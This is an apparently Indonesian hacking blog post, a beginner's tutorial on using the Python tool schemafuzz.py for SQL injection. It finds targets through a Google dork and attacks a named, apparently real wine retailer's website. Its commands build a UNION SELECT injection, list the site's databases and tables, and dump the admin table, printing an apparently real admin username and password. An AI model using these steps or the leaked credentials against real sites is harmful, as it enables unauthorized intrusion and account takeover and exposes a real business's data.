Sql Injection dengan Program Python
Angga Cyber4rt - Siang Sobat Angga . Kali Ini Cr00z999 atau yang akrab dipanggil Angga mau berbagi Tutorial Nih . Langsung Aja Yuk Kita Pelajari Tutorialnya ^_^
Khusus buat Para Newbie Yang pengen belajar,,, jadi buat para master yang udah jago di liat2 aja dech….
Mungkin masih banyak kekurangan dalam tutorial ini, untuk itu ayo kita sama sama belajar…
TKP :
Schema Fuzzy adalah tools yang di buat dengan bahasa python yang dipergunakan untuk melakukan test SQL Injection pada sebuah website…
feature dan hal2 yang di butuhkan yaitu :
1. Komputer (fast speed)
2. Koneksi internet (fast connection)
3. Program Python-2.6.4 (bisa di download Di Sini !! Setelah Di download Langsung Di install di PC/Laptop anda)
4. script schemafuzzy.py (adalah script yang akan di gunakan untuk mencari database,column and table ,, Untuk download scriptsx Klik Di Sini !!)
5. CMD
6. target website (misal menggunakan kata kunci di google : “products.php?cat=”)
Sudah Di siapkan?
di pastikan Kamu sudah install python2.6.4. Copy schemafuzz.py ke dalam dir python26. Kalo sudah selesai langsung jalankan. Caranya :
klik start>>Run>>CMD
truss and aktif ke directory c:\ dengan mengetik CD ../.. <– mundur 2 dir
masuk ke directory Python26 dengan cara ketik “cd Python26″ hingga muncul
C:\Python26>
schemafuzzy.py -u “target” –perintah
1. kita gunakan di target kita. (disini saya ambil target yang saya dapatkan di google dengan kata kunci : “products.php?cat=”) yaitu :
http://www.queenannewine.com/products.php?cat=1
2. Cek kolomnya
python schemafuzzy.py -u http://www.queenannewine.com/products.php?cat=1 –findcol
Hingga muncul :
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ -dbs
Hingga Muncul :
database ada 3 :
1. C239128_QAWcal
2. C239128_queen
3. C239128_queen2
tapi pada penjesalan ini kita akan gunakan database nomor2
4. Cari nama table dalam database C239128_queen
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –schema -D C239128_queen
Hingga Muncul Hasil :
5. Exploit Tables and Columns :
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –dump -D C239128_queen -T – di isi Nama table -C di isi nama columns..
Misal gua mau Melihat data data yang ada di columns admin :
Dengan perintah :
python schemafuzz.py -u “http://www.queenannewine.com/products.php?cat=1+AND+1=2+UNION+SELECT+0,dimensi, 2,3″ –dump -D C239128_queen -T admin -C adminUser,adminPassword
Hingga Muncul Hasil seperti di bawah ini :
jbalji:mcse6273:mcse6273:
ini adalah user dan password admin yang keluar.. . Cara ini hanya berlaku untuk sql versi 5. untuk versi 4, Harus Manual.
Nah user and password admin dah ketahuan… untuk login ke adminx.. silahkan anda cari sendiri link loginx….
oke sekian dari saya
segala penyalah gunaan dari artikel ini bukan Tanggung jawab penulis.
Semoga bermanfaat bagi anda.
Sumber
Semoga Postingan Ini Bermanfaat Bagi Semua nya .
Sebagai Ucapan Terimakasih, Cukup Klik Follow Di Gadget Sebelah Kanan Atau Klik Disini
Dan Jangna Lupa Tinggalkan Sebuah Komentar Juga Untuk Postingan Ini .
Sekian Dan Terimakasih
"BUDAYAKAN KASIH KOMEN"
1 komentar — Skip ke Kotak Komentar
wew..
Posting Komentar — or Kembali ke Postingan